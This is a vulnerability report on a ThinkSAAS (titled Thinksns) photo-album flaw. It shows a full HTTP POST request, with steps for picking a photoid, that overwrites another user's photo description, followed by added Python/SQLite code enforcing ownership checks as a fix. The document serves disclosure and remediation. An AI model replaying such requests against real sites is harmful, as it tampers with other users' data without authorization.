Thinksns: Unauthorized Modification of Album Photo Descriptions
POST request:

```
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: your login cookie

photoid%5B%5D=101&photodesc%5B%5D=test
```
Getting the parameters: log in to the demo on the official website, select an album at https://demo.thinksaas.cn/photo/, enter an album (https://demo.thinksaas.cn/photo/album/84/), then click on an image (https://demo.thinksaas.cn/photo/show/103/). The photoid%5B%5D parameter is the number after show in the URL. Replaying the request changes the description of another user's picture to the value of the photodesc%5B%5D parameter (test).
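A server-side ownership check for the `photoid[]` / `photodesc[]` update described in this report, as an added example that is not part of the original issue and not the project's own code. The table layout, column names and function names are assumptions, and Python with SQLite stands in for the application's stack.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """Constructed sample data: photo 101 belongs to user 1, photo 200 to user 2."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE photo (photoid INTEGER PRIMARY KEY, userid INTEGER, photodesc TEXT)")
    db.executemany("INSERT INTO photo VALUES (?, ?, ?)",
                   [(101, 1, "owner's text"), (200, 2, "mine")])
    return db

def update_descriptions(db, session_userid, raw_body):
    """Apply a photoid[]/photodesc[] form body on behalf of session_userid.

    Returns (updated_ids, rejected_ids). A row is written only when the photo
    belongs to the logged-in user; the owner comes from the session, never
    from the request.
    """
    form = parse_qs(raw_body, keep_blank_values=True)
    ids = form.get("photoid[]", [])
    descs = form.get("photodesc[]", [])
    if len(ids) != len(descs):
        raise ValueError("photoid[] and photodesc[] must pair up")
    updated, rejected = [], []
    for raw_id, desc in zip(ids, descs):
        if not (raw_id.isascii() and raw_id.isdigit()):
            rejected.append(raw_id)
            continue
        # Ownership is part of the WHERE clause, so the check and the write
        # are one statement and a foreign photoid matches zero rows.
        cur = db.execute(
            "UPDATE photo SET photodesc = ? WHERE photoid = ? AND userid = ?",
            (desc, int(raw_id), session_userid))
        (updated if cur.rowcount == 1 else rejected).append(raw_id)
    db.commit()
    return updated, rejected

def description(db, photoid):
    """Read back the stored description for one photo."""
    row = db.execute("SELECT photodesc FROM photo WHERE photoid = ?", (photoid,)).fetchone()
    return row[0]
```

The rejected list is worth logging with the session user id, since a non-empty list means a client submitted photo ids it does not own.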